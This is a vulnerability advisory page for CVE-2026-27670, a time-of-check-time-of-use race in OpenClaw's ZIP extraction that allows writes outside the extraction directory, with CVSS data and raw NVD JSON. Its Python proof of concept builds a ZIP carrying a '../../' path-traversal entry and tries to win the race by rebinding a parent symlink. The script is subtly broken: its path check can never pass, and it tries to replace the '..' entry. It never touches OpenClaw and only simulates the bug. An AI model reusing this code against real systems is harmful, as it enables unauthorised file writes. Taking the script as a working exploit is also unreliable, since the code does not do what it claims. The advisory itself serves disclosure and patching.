Security Vulnerability Report
CVE-2026-27670 CVSS 5.3 MEDIUM

Published: 2026-03-19 02:16:02
Last Modified: 2026-03-19 19:18:46

Description

OpenClaw versions prior to 2026.3.2 contain a race condition vulnerability in ZIP extraction that allows local attackers to write files outside the intended destination directory. Attackers can exploit a time-of-check-time-of-use race between path validation and file write operations by rebinding parent directory symlinks to redirect writes outside the extraction root.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE
OpenClaw < 2026.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2026-27670 PoC - OpenClaw ZIP Extraction Race Condition
This PoC demonstrates the TOCTOU race condition in ZIP extraction.
Note: This is for educational purposes only.
"""
import zipfile
import os
import time
import threading
import tempfile
import shutil


def create_malicious_zip():
    """Create a ZIP file with path traversal payload"""
    zip_path = '/tmp/malicious.zip'
    with zipfile.ZipFile(zip_path, 'w') as zf:
        # Payload: Write to parent directory via relative path
        zf.writestr('../../test_evil_file', 'Malicious content planted!')
    return zip_path


def race_condition_exploit():
    """
    Exploit the TOCTOU race condition:
    1. Create a safe-looking symlink during path check
    2. Rebind symlink before file write to redirect to target
    """
    extract_dir = tempfile.mkdtemp(prefix='openclaw_extract_')
    symlink_path = os.path.join(extract_dir, '..')

    # Simulate the vulnerable extraction logic
    def check_path(path):
        # Time-of-Check: Path appears safe
        normalized = os.path.normpath(path)
        return normalized.startswith(extract_dir)

    def write_file(path, content):
        # Time-of-Use: Write file (vulnerable to race)
        full_path = os.path.join(extract_dir, path)
        with open(full_path, 'w') as f:
            f.write(content)

    # Race condition: rebind parent directory between check and write
    def rebind_symlink():
        time.sleep(0.001)  # Tiny window for race
        try:
            # Rebind parent to /tmp to demonstrate escape
            if os.path.exists(symlink_path):
                os.unlink(symlink_path)
            os.symlink('/tmp', symlink_path)
        except:
            pass

    # Trigger race condition
    thread = threading.Thread(target=rebind_symlink)
    thread.start()

    # Simulate vulnerable extraction
    malicious_path = '../../test_evil_file'
    if check_path(malicious_path):
        write_file(malicious_path, 'Malicious content!')

    thread.join()

    # Cleanup
    shutil.rmtree(extract_dir, ignore_errors=True)


if __name__ == '__main__':
    print('CVE-2026-27670 PoC - Race Condition in ZIP Extraction')
    create_malicious_zip()
    print('Malicious ZIP created: /tmp/malicious.zip')
    print('Running race condition exploit...')
    race_condition_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27670", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:02.173", "lastModified": "2026-03-19T19:18:45.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.2 contain a race condition vulnerability in ZIP extraction that allows local attackers to write files outside the intended destination directory. Attackers can exploit a time-of-check-time-of-use race between path validation and file write operations by rebinding parent directory symlinks to redirect writes outside the extraction root."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a la 2026.3.2 contienen una vulnerabilidad de condición de carrera en la extracción de archivos ZIP que permite a atacantes locales escribir archivos fuera del directorio de destino previsto. Los atacantes pueden explotar una condición de carrera de tipo 'tiempo de verificación, tiempo de uso' entre la validación de rutas y las operaciones de escritura de archivos al reasignar enlaces simbólicos de directorios padre para redirigir las escrituras fuera de la raíz de extracción."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": 
"NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-367"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.2", "matchCriteriaId": "986EEC6C-F9E4-4B22-96D5-BBB98A4A738D"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/7dac9b05dd9d38dd3929637f26fa356fd8bdd107", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-r54r-wmmq-mh84", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": 
"https://www.vulncheck.com/advisories/openclaw-arbitrary-file-write-via-zip-extraction-parent-symlink-race-condition", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}